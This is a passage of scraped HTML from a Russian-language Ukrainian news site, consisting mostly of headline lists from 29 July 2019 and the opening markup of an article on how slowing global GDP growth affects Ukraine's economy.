class="name">Оборонная промышленность Китая развивается невероятными темпами и обгоняет США <span>(1181)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2907-stali-izvestny-primernye-sroki-raboty-vr" title="Стали известны примерные сроки работы ВР"><img width="210" height="156" alt="Стали известны примерные сроки работы ВР" src="https://enovosty.com/wp-content/uploads/2014/03/1363951718.jpg"></a><a href="https://enovosty.com/news_politics/full/2907-stali-izvestny-primernye-sroki-raboty-vr" title="Стали известны примерные сроки работы ВР" class="name">Стали известны примерные сроки работы ВР <span>(315)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2907-snbo-na-poroge-nastoyashhej-revolyucii" title="СНБО на пороге настоящей революции"><img width="210" height="156" alt="СНБО на пороге настоящей революции" src="https://enovosty.com/wp-content/uploads/2019/07/danil.jpg"></a><a href="https://enovosty.com/news_politics/full/2907-snbo-na-poroge-nastoyashhej-revolyucii" title="СНБО на пороге настоящей революции" class="name">СНБО на пороге настоящей революции <span>(1008)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2907-ukraincy-skupayut-nedvizhimost-v-polshe" title="Украинцы скупают недвижимость в Польше"><img width="210" height="156" alt="Украинцы скупают недвижимость в Польше" src="https://enovosty.com/wp-content/uploads/2019/04/polsha-e1554715987638.jpg"></a><a href="https://enovosty.com/news_economy/full/2907-ukraincy-skupayut-nedvizhimost-v-polshe" title="Украинцы скупают недвижимость в Польше" class="name">Украинцы скупают недвижимость в Польше <span>(1795)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news-auto/full/2807-sostavlen-rejting-avtomobilej-kotorymi-vladelcy-dovolny-bolshe-vsego" title="Составлен рейтинг автомобилей, которыми владельцы довольны больше всего"><img width="210" height="156" alt="Составлен рейтинг автомобилей, которыми владельцы довольны больше всего" src="https://enovosty.com/wp-content/uploads/2019/07/autorat-intro-1-e1564317122883.jpg"></a><a href="https://enovosty.com/news-auto/full/2807-sostavlen-rejting-avtomobilej-kotorymi-vladelcy-dovolny-bolshe-vsego" title="Составлен рейтинг автомобилей, которыми владельцы довольны больше всего" class="name">Составлен рейтинг автомобилей, которыми владельцы довольны больше всего <span>(3227)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2807-pereraschet-pensij-v-ukraine-komu-i-naskolko-povysyat-vyplaty" title="Перерасчет пенсий в Украине: кому и насколько повысят выплаты"><img width="210" height="156" alt="Перерасчет пенсий в Украине: кому и насколько повысят выплаты" src="https://enovosty.com/wp-content/uploads/2019/07/197429-e1564317439918.jpg"></a><a href="https://enovosty.com/news_economy/full/2807-pereraschet-pensij-v-ukraine-komu-i-naskolko-povysyat-vyplaty" title="Перерасчет пенсий в Украине: кому и насколько повысят выплаты" class="name">Перерасчет пенсий в Украине: кому и насколько повысят выплаты <span>(2300)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_technology/full/2807-novaya-kitajskaya-raketa-nositel-okazalas-podozritelno-poxozha-na-falcon-9" title="Новая китайская ракета-носитель оказалась подозрительно похожа на Falcon 9"><img width="210" height="156" alt="Новая китайская ракета-носитель оказалась подозрительно похожа на Falcon 9" src="https://enovosty.com/wp-content/uploads/2019/07/inx960x640-3-e1564316542272.jpg"></a><a href="https://enovosty.com/news_technology/full/2807-novaya-kitajskaya-raketa-nositel-okazalas-podozritelno-poxozha-na-falcon-9" title="Новая китайская ракета-носитель оказалась подозрительно похожа на Falcon 9" class="name">Новая китайская ракета-носитель оказалась подозрительно похожа на Falcon 9 <span>(595)</span></a></li></ul></li></ul></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости экономики</p></div><div class='cls'></div><span class='news_date'>29.07.2019 г.</span><br /><div class="post_news"><span id="post-4766836"><span class="postDate">16:12</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy">Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4766812"><span class="postDate">14:09</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-v-ukraine-umenshat-stoimost-operacij-po-bankovskim-kartochkam">В Украине уменьшат стоимость операций по банковским карточкам</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4766783"><span class="postDate">12:48</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-loukoster-ryanair-opyat-nepriyatno-udivil-passazhirov">Лоукостер Ryanair опять неприятно удивил пассажиров</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4766760"><span class="postDate">11:11</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-chto-to-snizyat-chto-to-povysyat-chto-budet-s-tarifami-v-ukraine">Что-то снизят, что-то - повысят: Что будет с тарифами в Украине</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4766757"><span class="postDate">10:55</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-ukraincy-skupayut-nedvizhimost-v-polshe">Украинцы скупают недвижимость в Польше</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4766744"><span class="postDate">09:50</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-eto-vyzyvaet-paniku-istochniki-rasskazali-ob-udare-danii-po-putinskomu-proektu">"Это вызывает панику": Источники рассказали об ударе Дании по путинскому проекту</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4766739"><span class="postDate">08:11</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2907-ne-nuzhno-izobretat-velosiped-ekonomist-rasskazal-kak-izmenit-ekonomiku-ukrainy">"Не нужно изобретать велосипед": Экономист рассказал, как изменить экономику Украины</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_economy">Все новости экономики</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">27.07.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/markets/full/2707-osobennosti-priobreteniya-nedvizhimosti-v-kottedzhnyx-gorodkax">Особенности приобретения недвижимости в коттеджных городках</a></p><div class="cblock"><a href="https://enovosty.com/markets/full/2707-osobennosti-priobreteniya-nedvizhimosti-v-kottedzhnyx-gorodkax"><img width="230" alt="Особенности приобретения недвижимости в коттеджных городках" src="/wp-content/uploads/2019/07/kottedz_ed.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/markets/full/2707-osobennosti-priobreteniya-nedvizhimosti-v-kottedzhnyx-gorodkax">Сайты по продаже недвижимости предлагают сегодня всем желающим жить «поближе к земле» варианты по приобретению участков, недостроев и готовых домов в ...</a></span></div><div class="block"><div class="info"><span class="postDate">26.07.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2607-itogi-dnya-novye-provokacii-fsb-ustupki-gazproma-i-strasti-vokrug-okruzhnogo-suda">Итоги дня: Новые провокации ФСБ, уступки "Газпрома" и страсти вокруг Окружного суда</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2607-itogi-dnya-novye-provokacii-fsb-ustupki-gazproma-i-strasti-vokrug-okruzhnogo-suda"><img width="230" alt="Итоги дня: Новые провокации ФСБ, уступки Газпрома и страсти вокруг Окружного суда" src="/wp-content/uploads/2019/07/a32d0d2-okrujhniy-sud.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2607-itogi-dnya-novye-provokacii-fsb-ustupki-gazproma-i-strasti-vokrug-okruzhnogo-suda">ЦИК обработала 100% протоколов, НАБУ и ГПУ расследуют вмешательство Окружного суда в работу власти, а "Газпром" намерен продлить на небольшой срок контракт ...</a></span></div><div class="block"><div class="info"><span class="postDate">25.07.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2607-itogi-dnya-portret-novoj-rady-zaderzhannyj-tanker-rf-i-podgotovka-k-neprostoj-zime">Итоги дня: Портрет новой Рады, задержанный танкер РФ и подготовка к непростой зиме</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2607-itogi-dnya-portret-novoj-rady-zaderzhannyj-tanker-rf-i-podgotovka-k-neprostoj-zime"><img width="230" alt="Итоги дня: Портрет новой Рады, задержанный танкер РФ и подготовка к непростой зиме" src="/wp-content/uploads/2019/07/24412625-1-e1564057159645.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2607-itogi-dnya-portret-novoj-rady-zaderzhannyj-tanker-rf-i-podgotovka-k-neprostoj-zime">СБУ задержала российский танкер, Украина начала готовится к грядущей зиме, а украинцы продолжают активно обсуждать результаты выборов в Раду, - такими ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>29.07.2019 г.</span><br /><div class="post_news"> <span id="post-4766841"> <span class="postDate">20:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2907-obnaruzheny-bakterii-predotvrashhayushhie-ozhirenie">Обнаружены бактерии, предотвращающие ожирение</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766892"> <span class="postDate">20:21</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-kieve-posle-livnya-obrazovalsya-ocherednoj-potop-video">В столице после ливня затоплены улицы и авто (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766832"> <span class="postDate">20:15</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-top-3-poleznyx-produkta-dlya-raboty-mozga">ТОП-3 полезных продукта для работы мозга</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766838"> <span class="postDate">20:00</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-v-kieve-na-odnoj-iz-stancij-poezd-nasmert-sbil-muzhchinu">В Киеве на одной из станций поезд насмерть сбил мужчину</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766888"> <span class="postDate">19:52</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-the-washington-post-u-ukrainy-poyavilsya-ekstraordinarnyj-shans-vse-izmenit">The Washington Post: У Украины появился экстраординарный шанс все изменить</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766834"> <span class="postDate">19:30</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-v-stolice-v-chastnom-sektore-pytalis-rasstrelyat-sobak-video">В столице в частном секторе пытались расстрелять собак (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766885"> <span class="postDate">19:18</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-na-yuge-afriki-zhestoko-ubili-ukrainskogo-turista">На юге Африки жестоко убили украинского туриста</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766826"> <span class="postDate">19:15</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2907-teoriyu-otnositelnosti-ejnshtejna-pytalis-postavit-pod-somnenie">Теорию относительности Эйнштейна пытались поставить под сомнение</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766883"> <span class="postDate">19:12</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-reuters-dzhonson-soobshhil-o-neobxodimosti-novogo-soglasheniya-o-brexit">Reuters: Джонсон сообщил о необходимости нового соглашения о Brexit</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766875"> <span class="postDate">18:46</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-smertelnye-attrakciony-kalechat-i-ubivayut-ukraincev">"Смертельные" аттракционы калечат и убивают украинцев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766873"> <span class="postDate">18:23</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-associated-press-rossijskij-oppozicioner-navalnyj-mog-byt-otravlen">Associated press: Навального выписали из больницы и отправили обратно в тюрьму</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766868"> <span class="postDate">18:04</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-stalo-izvestno-pochemu-opasen-chrezmernyj-zagar">Стало известно, почему опасен чрезмерный загар</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766862"> <span class="postDate">17:48</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-osvobodite-britanskij-korabl-chtoby-vyjti-iz-tmy-glava-mid-velikobritanii">Освободите британский корабль, чтобы «выйти из тьмы», - глава МИД Великобритании</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766856"> <span class="postDate">17:23</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-cherkasskoj-oblasti-startoval-proekt-policejskij-oficer-obshhiny-video">В Черкасской области стартовал проект «Полицейский офицер общины» (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766853"> <span class="postDate">17:07</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-rossiya-mozhet-prevratitsya-v-kitajskuyu-soevuyu-plantaciyu">Россия может превратиться в китайскую соевую плантацию</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766851"> <span class="postDate">16:49</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2907-v-minfine-soobshhili-skolko-ukraincev-uexalo-na-zarobotki-za-rubezh">В Минфине сообщили, сколько украинцев уехало на зароботки за рубеж</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766848"> <span class="postDate">16:29</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2907-v-stolice-na-skandalnom-mostu-vnov-tresnulo-steklo-video">В столице на скандальном мосту вновь треснуло стекло (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766836"> <span class="postDate">16:12</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy">Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766828"> <span class="postDate">15:53</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2907-nbu-planiruet-postepenno-snizhat-uchetnuyu-stavku">НБУ планирует постепенно снижать учетную ставку</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766829"> <span class="postDate">15:50</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-ostalos-podozhdat-finalnoj-kulminacii-dnr-prixodit-konec-bloger">Осталось подождать финальной кульминации: "ДНР" приходит конец, - блогер</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766823"> <span class="postDate">15:24</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-okkupanty-oboruduyut-skrytye-ognevye-pozicii-v-seroj-zone-razvedka">Оккупанты оборудуют скрытые огневые позиции в "серой" зоне, - разведка</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766821"> <span class="postDate">15:04</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2907-kreml-pytaetsya-sorvat-oruzhejnyj-kontrakt-ukrainy-i-ssha-zloj-odessit">Кремль пытается сорвать оружейный контракт Украины и США, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766784"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2907-nazvan-samyj-ekonomichnyj-elektromobil-v-mire">Назван самый экономичный электромобиль в мире</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766799"> <span class="postDate">14:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-sibiri-gorit-tri-milliona-gektarov-lesov-zhiteli-zhaluyutsya-na-udushlivyj-smog-foto">В Сибири горит три миллиона гектаров лесов: жители жалуются на удушливый смог (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766803"> <span class="postDate">14:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-indii-otkrylos-kafe-gde-musor-obmenivayut-na-edu">В Индии открылось кафе, где мусор обменивают на еду</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766818"> <span class="postDate">14:22</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-ukraine-zakryli-otkrytyj-reestr-korrupcionerov">В Украине закрыли открытый реестр коррупционеров</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766816"> <span class="postDate">14:19</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-v-germanii-zhestoko-ubili-zarobitchanku-iz-ukrainy">В Германии жестоко убили заробитчанку из Украины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766814"> <span class="postDate">14:11</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2907-apple-vedet-proslushku-razgovorov-polzovatelej-s-siri">Apple ведет прослушку разговоров пользователей с Siri</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766812"> <span class="postDate">14:09</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-v-ukraine-umenshat-stoimost-operacij-po-bankovskim-kartochkam">В Украине уменьшат стоимость операций по банковским карточкам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766810"> <span class="postDate">13:42</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-ukraine-sushhestvenno-pomenyayut-pravila-obucheniya-v-universitetax">В Украине существенно поменяют правила обучения в университетах</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766781"> <span class="postDate">13:35</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2907-ceny-na-svininu-stremitelno-rastut-chto-budet-dalshe">Цены на свинину стремительно растут. Что будет дальше?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766777"> <span class="postDate">13:25</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-nazvali-professiyu-kotoraya-umenshaet-mozg">Назвали профессию, которая уменьшает мозг</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766801"> <span class="postDate">13:09</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-v-livii-sbili-dva-samoleta-predpolozhitelno-prinadlezhashhie-ukrainskoj-kompanii">В Ливии сбили два самолета, предположительно принадлежащие украинской компании</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766793"> <span class="postDate">12:53</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-putin-probil-ocherednoe-dno-zhurnalist">Путин пробил очередное дно, - журналист</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766792"> <span class="postDate">12:49</span> <a class="postTitle" href="https://enovosty.com/uk/news/full/2907-v-anneksirovannom-krymu-proizoshlo-novoe-ekologicheskoe-bedstvie">В аннексированном Крыму произошло новое экологическое бедствие</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766788"> <span class="postDate">12:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-anneksirovannom-krymu-proizoshlo-novoe-ekologicheskoe-bedstvie">В аннексированном Крыму произошло новое экологическое бедствие</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766783"> <span class="postDate">12:48</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-loukoster-ryanair-opyat-nepriyatno-udivil-passazhirov">Лоукостер Ryanair опять неприятно удивил пассажиров</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766779"> <span class="postDate">12:35</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2907-avtokraz-predstavil-ocherednuyu-novinku-dlya-ukrainskix-voennyx">АвтоКрАЗ представил очередную новинку для украинских военных</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766768"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2907-ukrainskaya-molochka-edet-v-yaponiyu-eksport-rastet">Украинская молочка едет в Японию. Экспорт растет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766772"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-zdes-net-malenkix-zelenyx-chelovechkov-chto-izvestno-o-zagadochnoj-zone-51-v-ssha-foto">«Здесь нет маленьких зеленых человечков»: что известно о загадочной Зоне 51 в США (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766764"> <span class="postDate">12:23</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-vrachi-rasskazali-kakim-dolzhen-byt-racion-posle-50">Врачи рассказали, каким должен быть рацион после 50</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766767"> <span class="postDate">12:21</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-oboronnaya-promyshlennost-kitaya-razvivaetsya-neveroyatnymi-tempami-i-obgonyaet-ssha">Оборонная промышленность Китая развивается невероятными темпами и обгоняет США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766766"> <span class="postDate">12:13</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-eto-ne-samoubijstvo-poyavilis-vazhnye-podrobnosti-gibeli-tymchuka">"Это не самоубийство": появились важные подробности гибели Тымчука</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766763"> <span class="postDate">11:54</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-demokratiyu-zabivayut-policejskimi-dubinkami-budushhee-rossii-neyasno-the-times">Демократию забивают полицейскими дубинками: Будущее России неясно, - The Times</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766762"> <span class="postDate">11:30</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-stali-izvestny-primernye-sroki-raboty-vr">Стали известны примерные сроки работы ВР</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766760"> <span class="postDate">11:11</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-chto-to-snizyat-chto-to-povysyat-chto-budet-s-tarifami-v-ukraine">Что-то снизят, что-то - повысят: Что будет с тарифами в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766759"> <span class="postDate">11:07</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-snbo-na-poroge-nastoyashhej-revolyucii">СНБО на пороге настоящей революции</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766758"> <span class="postDate">11:06</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-u-zelenskogo-rasskazali-chto-budut-delat-s-sbu-i-kontrrazvedkoj">У Зеленского рассказали, что будут делать с СБУ и контрразведкой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766757"> <span class="postDate">10:55</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-ukraincy-skupayut-nedvizhimost-v-polshe">Украинцы скупают недвижимость в Польше</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766756"> <span class="postDate">10:28</span> <a class="postTitle" href="https://enovosty.com/news/full/2907-izrail-i-ssha-ispytali-sistemu-pro-sposobnuyu-perexvatyvat-rakety-v-kosmose">Израиль и США испытали систему ПРО, способную перехватывать ракеты в космосе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766755"> <span class="postDate">10:21</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-stalo-izvestno-kak-belarus-ugodila-v-dolgovuyu-lovushku">Стало известно, как Беларусь угодила в долговую ловушку</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766745"> <span class="postDate">10:10</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-miroslav-gaj-rasskazal-kakie-territorii-ukrainy-mogut-ujti-v-rossiyu">Мирослав Гай рассказал, какие территории Украины могут уйти в Россию</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766754"> <span class="postDate">09:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-kiev-zakupit-oruzhie-v-ssha">Киев закупит оружие в США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766744"> <span class="postDate">09:50</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-eto-vyzyvaet-paniku-istochniki-rasskazali-ob-udare-danii-po-putinskomu-proektu">"Это вызывает панику": Источники рассказали об ударе Дании по путинскому проекту</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766752"> <span class="postDate">09:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-alpax-molniya-ubila-sportsmenku-vo-vremya-zabega">В Альпах молния убила спортсменку во время забега</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766751"> <span class="postDate">09:21</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-ssha-byla-otkryta-strelba-na-festivale-gilroy-garlic-video">В США была открыта стрельба на фестивале Gilroy Garlic (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766742"> <span class="postDate">09:16</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-sbu-rassekretila-opasnogo-agenta-fsb-rabotavshego-po-dvum-stranam-foto">СБУ рассекретила опасного агента ФСБ, "работавшего" по двум странам (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766748"> <span class="postDate">09:00</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2907-na-plyazhax-kieva-nashli-kishechnuyu-palochku">На пляжах Киева нашли кишечную палочку</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766741"> <span class="postDate">08:45</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-ogromnyj-eksportnyj-potencial-stalo-izvestno-kogo-zainteresoval-ukrainskij-oplot">Огромный экспортный потенциал: Стало известно, кого заинтересовал украинский "Оплот"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4766747"> <span class="postDate">08:38</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-navalnogo-mogli-otravit">Навального могли отравить</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4766836"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_economy">Новости экономики</a> <span>&raquo;</span> Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины</div><time datetime="2019-07-29T16:12:14+03:00"><span id="date">Новости экономики, 16:12:14 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw 